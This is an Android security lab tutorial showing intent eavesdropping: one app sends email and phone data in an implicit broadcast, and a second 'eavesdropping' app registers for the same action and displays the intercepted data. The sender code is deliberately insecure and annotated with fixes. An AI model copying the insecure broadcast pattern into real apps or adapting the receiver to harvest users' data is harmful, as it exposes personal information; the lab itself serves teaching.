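This lab illustrates the concept of intent eavesdropping. The comp1 activity in App1 intends to send a broadcast intent carrying data to a BroadcastReceiver in the same app (App1). Because the broadcast is implicit (addressed only by an action string), it is delivered to any receiver registered for that action, including a malicious external app, App2, which intercepts the sensitive message carried by the intent. The intended communication is intra-app IPC; the eavesdropping can be prevented with secure programming, for example by addressing the broadcast explicitly to the app's own receiver.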
First, create a new Android Studio project and choose "Empty Activity". Click "Next"
Name it “InterAppSender” with the company domain of "example.com" and click on Next
Right Click on "example.com.InterAppSender--> New-->Java Class"
Name the class as "ShowInfoofIntent"
Right Click on "example.com.InterAppSender--> New-->Java Class"
Name the class as "MyReceiver"
Click on "Layout-->New-->XML--> Layout XML File"
Name the file "showinfoofintent" (all lowercase, since the code refers to it as R.layout.showinfoofintent), then copy and paste all the following code into the corresponding files
//Copy and paste the following code into “MainActivity.java”.
//MainActivity.java
package example.com.interappsender;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.widget.EditText;
/**
 * Sender screen of the lab: reads an e-mail address and a phone number from the
 * two input fields and broadcasts them when the Send button is pressed.
 *
 * <p>SECURITY NOTE: this is the deliberately insecure version. The broadcast is
 * implicit (addressed only by the action string "com.example.MyBroadcast"), so
 * the system may deliver it, extras included, to any receiver on the device
 * that declares the same action, not just this app's own MyReceiver.
 */
public class MainActivity extends AppCompatActivity {
    private EditText email;
    private EditText phone;

    /** Inflates the layout and looks up the two input fields. */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        email = findViewById(R.id.email);
        phone = findViewById(R.id.phone);
    }

    /**
     * Click handler bound from activity_main.xml (android:onClick="onClick").
     * Packs the entered values into an intent and broadcasts it.
     *
     * @param view the button that was clicked (unused)
     */
    public void onClick(View view) {
        String emailText = email.getText().toString();
        String phoneText = phone.getText().toString();

        // Secure variant: an explicit intent is delivered only to this app's receiver.
        //Intent intent = new Intent(this,MyReceiver.class);
        // Other sender-side options that keep the data inside the app:
        // setPackage(getPackageName()) on the intent, or
        // sendBroadcast(intent, receiverPermission) with a signature-level permission.
        Intent broadcast = new Intent("com.example.MyBroadcast");
        broadcast.putExtra("Email", emailText);
        broadcast.putExtra("Phone", phoneText);
        sendBroadcast(broadcast);
    }
}
//Copy the following code into “activity_main.xml”. Make sure to click on the “Text” tab at the bottom left of the “activity_main.xml” window
//activity_main.xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Sender screen: an e-mail field, a phone field and a Send button. -->
<!-- The @string/e_mail, @string/phone and @string/send resources must exist in res/values/strings.xml; they are not listed on this page. -->
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context="example.com.interappsender.MainActivity">
<!-- Label above the e-mail input. -->
<TextView
android:id="@+id/email_text"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignParentTop="true"
android:layout_centerHorizontal="true"
android:layout_marginTop="95dp"
android:text="@string/e_mail"
android:textSize="20sp"/>
<!-- E-mail input, read by MainActivity through R.id.email. -->
<!-- NOTE(review): the framework's standard autofill hint for an e-mail field is "emailAddress"; confirm whether the custom value "Email" is intended. -->
<EditText
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:id="@+id/email"
android:layout_below="@+id/email_text"
android:layout_centerHorizontal="true"
android:ems="10"
android:background="#BED2CE"
android:layout_marginTop="5dp"
android:gravity="center"
android:autofillHints="Email" />
<!-- Label above the phone input. -->
<TextView
android:id="@+id/phone_num"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignEnd="@+id/email_text"
android:layout_below="@+id/email"
android:layout_marginTop="19dp"
android:text="@string/phone"
android:textSize="20sp"/>
<!-- Phone input, read by MainActivity through R.id.phone. -->
<EditText
android:id="@+id/phone"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_below="@+id/phone_num"
android:layout_centerHorizontal="true"
android:layout_marginTop="5dp"
android:ems="10"
android:inputType="phone"
android:background="#BED2CE"
android:gravity="center"/>
<!-- android:onClick="onClick" binds this button to MainActivity.onClick(View), which sends the broadcast. -->
<Button
android:id="@+id/send"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_below="@+id/phone"
android:layout_centerHorizontal="true"
android:layout_marginTop="36dp"
android:onClick="onClick"
android:text="@string/send"
tools:ignore="UsingOnClickInXml" />
</RelativeLayout>
//Copy the following code into the newly created “ShowInfoofIntent.java”.
//ShowInfoofIntent.java
package example.com.interappsender;
import android.app.Activity;
import android.os.Bundle;
import android.widget.TextView;
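/**
 * Result screen of the sender app: shows the "Email" and "Phone" extras of the
 * intent that started it.
 *
 * <p>The values are only displayed, never interpreted. They arrive via
 * MyReceiver, which the manifest declares as exported, so they should be
 * treated as untrusted text.
 */
public class ShowInfoofIntent extends Activity {
    private TextView phone;
    private TextView email;

    /**
     * Inflates the layout and copies the two extras into the value fields.
     *
     * @param savedInstanceState previously saved state, passed to the superclass
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.showinfoofintent);
        phone = findViewById(R.id.Phone);
        email = findViewById(R.id.Email);

        // getStringExtra() returns null when the launching intent has no extras
        // at all, whereas getExtras().getString() would throw a
        // NullPointerException in that case. A null text leaves the field empty.
        email.setText(getIntent().getStringExtra("Email"));
        phone.setText(getIntent().getStringExtra("Phone"));
    }
}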
//Copy the following code into the newly created “MyReceiver.java”.
// MyReceiver.java
package example.com.interappsender;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
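/**
 * Receiver inside the sender app: takes the "Email" and "Phone" extras of the
 * broadcast and forwards them to the ShowInfoofIntent activity.
 *
 * <p>The manifest declares this receiver as exported with an intent filter, so
 * broadcasts can arrive from other apps as well. The extras are therefore
 * untrusted and may be missing.
 */
public class MyReceiver extends BroadcastReceiver {
    /**
     * Forwards the received values to the result screen.
     *
     * @param context context the receiver is running in
     * @param intent  the received broadcast
     */
    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle extras = intent.getExtras();
        if (extras == null) {
            // A broadcast without extras would otherwise crash the receiver
            // with a NullPointerException; there is nothing to display.
            return;
        }
        String email = extras.getString("Email");
        String phone = extras.getString("Phone");

        Intent show = new Intent();
        show.putExtra("Email", email);
        show.putExtra("Phone", phone);
        // Required when starting an activity from a non-activity context.
        show.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        // Explicit target: the result screen of this same app.
        show.setClassName("example.com.interappsender", "example.com.interappsender.ShowInfoofIntent");
        context.startActivity(show);
    }
}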
Copy the following code into “showinfoofintent.xml” file.
showinfoofintent.xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Result screen: two labels (ids email / phone) and two value fields (ids Email / Phone). -->
<!-- The ids differ only in case; ShowInfoofIntent.java writes to R.id.Email and R.id.Phone. -->
<!-- The @string/email and @string/phone resources must exist in res/values/strings.xml; they are not listed on this page. -->
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context="example.com.interappsender.ShowInfoofIntent">
<!-- Static label for the e-mail row. -->
<TextView
android:id="@+id/email"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignParentStart="true"
android:layout_alignParentTop="true"
android:layout_marginStart="100dp"
android:layout_marginTop="80dp"
android:text="@string/email"
android:background="#BED2CE"
android:textSize="20sp"/>
<!-- Static label for the phone row. -->
<TextView
android:id="@+id/phone"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignStart="@+id/email"
android:layout_below="@+id/email"
android:layout_marginTop="30dp"
android:text="@string/phone"
android:background="#BED2CE"
android:textSize="20sp"/>
<!-- Value field filled with the "Email" extra at runtime. -->
<TextView
android:id="@+id/Email"
android:layout_width="100dp"
android:layout_height="wrap_content"
android:layout_alignBottom="@+id/email"
android:layout_marginStart="38dp"
android:layout_toEndOf="@+id/email"
android:background="#669999"
android:gravity="center"
android:textSize="20sp"/>
<!-- Value field filled with the "Phone" extra at runtime. -->
<TextView
android:id="@+id/Phone"
android:layout_width="100dp"
android:layout_height="wrap_content"
android:layout_alignBaseline="@+id/phone"
android:layout_alignBottom="@+id/phone"
android:layout_alignStart="@+id/Email"
android:background="#669999"
android:gravity="center"
android:textSize="20sp"/>
</RelativeLayout>
//Copy the following code into “AndroidManifest.xml”.
//AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Manifest of the sender app (InterAppSender): launcher activity, result screen and broadcast receiver. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="example.com.interappsender">
<!-- NOTE(review): allowBackup="true" lets app data be included in device backups; confirm this is intended for an app that handles contact details. -->
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/Theme.InterAppSender">
<!-- Launcher entry point; exported so the home screen can start it. -->
<activity
android:name=".MainActivity"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<!-- No intent filter and no android:exported attribute: this activity is not exported by default, so only this app can start it. -->
<activity android:name=".ShowInfoofIntent" >
</activity>
<!-- SECURITY: exported="true" plus an intent filter means any app on the device can deliver a broadcast with action com.example.MyBroadcast to MyReceiver, so its extras are untrusted input. -->
<!-- If the receiver is meant only for this app's own broadcasts, android:exported="false" combined with an explicit intent on the sender side keeps the exchange inside the app. -->
<receiver android:name=".MyReceiver"
android:exported="true">
<intent-filter>
<action android:name="com.example.MyBroadcast"/>
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</receiver>
</application>
</manifest>
Save the project and run it on the AVD; it should show this interface
Enter your email and phone number, then click on Send
This would be the final interface
Next, create a second Android Studio project for the eavesdropping app and choose "Empty Activity". Click "Next"
Name it “EavesdroppingApp” with the company domain of "example.com" and click on Next
Right Click on "example.com.eavesdroppingapp-->New-->Java Class"
Name the new class 'MyReceiver' then click on 'Ok' button.
//Copy and paste the following code into “MainActivity.java”.
//MainActivity.java
package example.com.eavesdroppingapp;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
/**
 * Placeholder screen of the second lab app. It only shows the static layout;
 * the broadcast handling lives in MyReceiver.
 */
public class MainActivity extends AppCompatActivity {

    /** Inflates activity_main.xml; no other setup is performed. */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        final int layoutId = R.layout.activity_main;
        setContentView(layoutId);
    }
}
//Copy the following code into the newly created “MyReceiver.java”.
//MyReceiver.java
package example.com.eavesdroppingapp;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.os.CountDownTimer;
import android.widget.Toast;
/**
 * Lab demonstration of what a third-party receiver sees when a sender uses an
 * unprotected implicit broadcast: the "Email" and "Phone" extras are read and
 * shown in a toast.
 *
 * <p>Delivery to this class depends entirely on the sender. An explicit
 * intent, a package-restricted intent, or a broadcast protected by a
 * signature-level receiver permission never reaches this receiver.
 */
public class MyReceiver extends BroadcastReceiver {

    /**
     * Displays the received extras and keeps the toast visible for about ten
     * seconds by showing it again on every timer tick.
     *
     * @param context context the receiver is running in
     * @param intent  the received broadcast
     */
    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle extras = intent.getExtras();
        String emailValue = extras.getString("Email");
        String phoneValue = extras.getString("Phone");

        String message = "Eavesdropping from Receiver app (insecured version)\nE-mail "
                + emailValue + "\n" + "Phone" + phoneValue + "\n";
        final Toast tag = Toast.makeText(context, message, Toast.LENGTH_SHORT);
        tag.show();

        // 10 s total, one tick per second; each callback shows the toast again.
        new CountDownTimer(10000, 1000) {
            @Override
            public void onTick(long millisUntilFinished) {
                tag.show();
            }

            @Override
            public void onFinish() {
                tag.show();
            }
        }.start();
    }
}
//Copy the following code into “AndroidManifest.xml”. Make sure to click on the “Text” tab at the bottom left of the “AndroidManifest.xml” window
//AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Manifest of the second lab app (EavesdroppingApp): a launcher activity and a receiver for the sender's action string. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="example.com.eavesdroppingapp">
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/Theme.EavesdroppingApp">
<!-- Launcher entry point. -->
<activity
android:name=".MainActivity"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<!-- Declares the same action string the sender broadcasts. For an implicit broadcast a matching action is all that delivery requires, which is the weakness this lab demonstrates. -->
<!-- NOTE: the platform restricts this path. Apps that target Android 8.0 (API 26) or higher do not receive most implicit broadcasts through manifest-declared receivers, so the result depends on the target SDK and AVD image. -->
<receiver android:name=".MyReceiver"
android:exported="true">
<intent-filter>
<action android:name="com.example.MyBroadcast"/>
</intent-filter>
</receiver>
</application>
</manifest>
//Copy the following code into “activity_main.xml”. Make sure to click on the “Text” tab at the bottom left of the “activity_main.xml” window
//activity_main.xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Single-screen layout of the second lab app: one centered, static text label. -->
<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context="example.com.eavesdroppingapp.MainActivity">
<!-- Constrained to all four parent edges, which centers the label. The text is hard-coded rather than taken from strings.xml. -->
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="This is an eavesdropping app"
app:layout_constraintBottom_toBottomOf="parent"
app:layout_constraintLeft_toLeftOf="parent"
app:layout_constraintRight_toRightOf="parent"
app:layout_constraintTop_toTopOf="parent" />
</androidx.constraintlayout.widget.ConstraintLayout>
Save your project and run it on the same AVD as the previous app
This would be the final interface